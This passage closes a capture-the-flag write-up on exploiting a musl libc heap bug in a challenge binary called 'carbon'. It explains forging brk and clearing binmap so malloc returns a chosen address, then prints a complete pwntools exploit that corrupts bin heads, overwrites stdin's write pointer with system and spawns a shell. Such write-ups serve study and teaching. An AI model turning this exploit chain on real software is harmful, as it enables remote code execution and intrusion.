In the __expand_heap function, brk is a pointer to the end of the data segment (dynamic memory). __expand_heap uses the brk system call, __syscall(SYS_brk, brk+n), to extend the end of the data segment by n bytes, and the newly extended region is returned to malloc to be handed to the user as a new chunk.
If the program does not enable PIE, the data segment sits at a low address (roughly 0~0x2000000), relatively close to 0xBADBEEF. So if the brk pointer is modified to 0xBADBEEF - n, the brk system call will extend the data segment past 0xBADBEEF, making it an accessible memory address.
edit(binmap, 'X' * 16 + p64(0))
edit(brk, p64(0xbadbeef - 0x20))
add(0) # malloc returns 0xbadbeef
Set mal.binmap to 0, set brk to 0xbadbecf (i.e. 0xbadbeef - 0x20), then call add(0) to allocate a 0x20-byte chunk; the pointer returned by malloc is exactly 0xBADBEEF.
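The arithmetic behind the choice of 0xbadbeef - 0x20 can be checked by hand: in musl, expand_heap pads the request by SIZE_ALIGN (0x20 on 64-bit) to make room for a zone sentinel, __expand_heap rounds the total up to a page, and the user pointer ends up SIZE_ALIGN bytes past the old brk (the sentinel minus the 0x10-byte chunk header, plus the 0x10-byte header skip of CHUNK_TO_MEM). Below is a simplified model of that computation, not the full expand_heap logic; the constants are musl's 64-bit SIZE_ALIGN and OVERHEAD:

```python
PAGE_SIZE  = 4096
SIZE_ALIGN = 4 * 8   # 4*sizeof(size_t) on 64-bit musl
OVERHEAD   = 2 * 8   # 2*sizeof(size_t): the chunk header

def simulate_expand_heap(brk, request):
    """Simplified model of musl's expand_heap() for a fresh heap zone:
    returns (new_brk, user_pointer) for the chunk handed back by malloc."""
    n = request + SIZE_ALIGN              # room for the zone sentinel
    n += -n & (PAGE_SIZE - 1)             # page-align, as __expand_heap does
    new_brk = brk + n                     # SYS_brk moves the segment end
    chunk = brk + SIZE_ALIGN - OVERHEAD   # first SIZE_ALIGN bytes = sentinel
    mem = chunk + OVERHEAD                # CHUNK_TO_MEM skips the header
    return new_brk, mem
```

With brk forged to 0xbadbeef - 0x20, the user pointer comes out as 0xbadbeef regardless of the (small) request size.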
Note that the fake chunk at mal.binmap needs to be constructed in the earlier step, so that the original binmap value is not destroyed before it has served its purpose.
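Why must binmap be zeroed? In the malloc loop quoted earlier, mask = mal.binmap & -(1ULL<<i) selects the non-empty bins at index i or above, and only when mask is 0 does malloc fall through to expand_heap. A small model of that check (the function name is mine; the arithmetic mirrors the quoted source):

```python
def must_expand_heap(binmap, i):
    """Mirror of `mask = mal.binmap & -(1ULL<<i)` from src/malloc/malloc.c:
    True when no bin at index >= i is marked non-empty, i.e. when malloc
    has to call expand_heap()."""
    mask = binmap & (-(1 << i) & 0xFFFFFFFFFFFFFFFF)  # 64-bit two's complement
    return mask == 0
```

Clearing mal.binmap makes mask == 0 for every i, so the very next allocation is guaranteed to take the expand_heap path and consume the forged brk value.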
4.5 Exploit script
The exploit Python script is as follows:
#!/usr/bin/env python2
from pwn import *
import sys
context(arch="amd64", log_level="debug")
if len(sys.argv) >= 3:
    p = remote(sys.argv[1], sys.argv[2])
else:
    p = process("./carbon")

def alloc(sz, ctx='\n', ans='N'):
    p.sendlineafter(">", '1')
    p.sendlineafter("What is your prefer size? >", str(sz))
    p.sendlineafter("Are you a believer? >", ans)
    p.sendafter("Say hello to your new sleeve >", ctx)

def free(idx):
    p.sendlineafter(">", '2')
    p.sendlineafter("What is your sleeve ID? >", str(idx))

def edit(idx, ctx):
    p.sendlineafter(">", '3')
    p.sendlineafter("What is your sleeve ID? >", str(idx))
    p.send(ctx)

def view(idx):
    p.sendlineafter(">", '4')
    p.sendlineafter("What is your sleeve ID? >", str(idx))
    return p.recvuntil("Done.", True)
alloc(0x1, 'A') #0
libc_base = u64(view(0).ljust(8, '\x00')) - 0x292e41
info("libc base: 0x%x", libc_base)
stdin = libc_base + 0x292200
binmap = libc_base + 0x292ac0
brk = libc_base + 0x295050
bin = libc_base + 0x292e40
system = libc_base + 0x42688
# 1. construct fake chunks
alloc(0x10) #1
alloc(0x10) #2, prevent consolidation
alloc(0x10) #3
alloc(0x10) #4, prevent consolidation
alloc(0x10) #5
alloc(0x10) #6, prevent consolidation
alloc(0x10) #7
alloc(0x10) #8, prevent consolidation
free(1)
free(3)
payload = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(stdin - 0x10) * 2
payload += p8(0x20)
payload += '\n'
alloc(0x10, payload, 'Y') #1
alloc(0x10) #3
free(1) # set as non-empty bin
edit(3, p64(binmap - 0x20) * 2)
alloc(0x10) #1
free(5) # set as non-empty bin
edit(3, p64(brk - 0x10) * 2)
alloc(0x10) #5
free(7) # set as non-empty bin
# 2. corrupt bin head and get arbitrary pointers
edit(3, p64(bin - 0x10) + p64(stdin - 0x10))
alloc(0x10) #7
alloc(0x50) #9
edit(3, p64(bin - 0x10) + p64(brk - 0x10))
alloc(0x10) #10
alloc(0x50) #11
edit(3, p64(bin - 0x10) + p64(binmap - 0x20))
alloc(0x10) #12
alloc(0x50) #13
# 3. corrupt stdin, binmap and brk
payload = "/bin/sh\x00" # stdin->flags
payload += 'X' * 0x20
payload += p64(0xdeadbeef) # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead) # stdin->wbase
payload += 'X' * 8
payload += p64(system) # stdin->write
edit(9, payload) # stdin
edit(11, p64(0xbadbeef - 0x20) + '\n') # brk
edit(13, 'X' * 0x10 + p64(0) + '\n') # binmap
# 4. get shell
p.sendlineafter(">", '1')
p.sendlineafter("What is your prefer size? >", '0')
p.interactive()
5. Summary
This article showed how, under musl libc, a heap overflow can be used to hijack the head of a bin's linked list, how unbin can then be abused to tamper with list pointers and achieve arbitrary address writes, and finally how FSOP yields a shell. Along the way it also covered the general implementation of the musl libc heap manager, a trick for making malloc return an arbitrary address, and the mistakes in the challenge together with their fixes.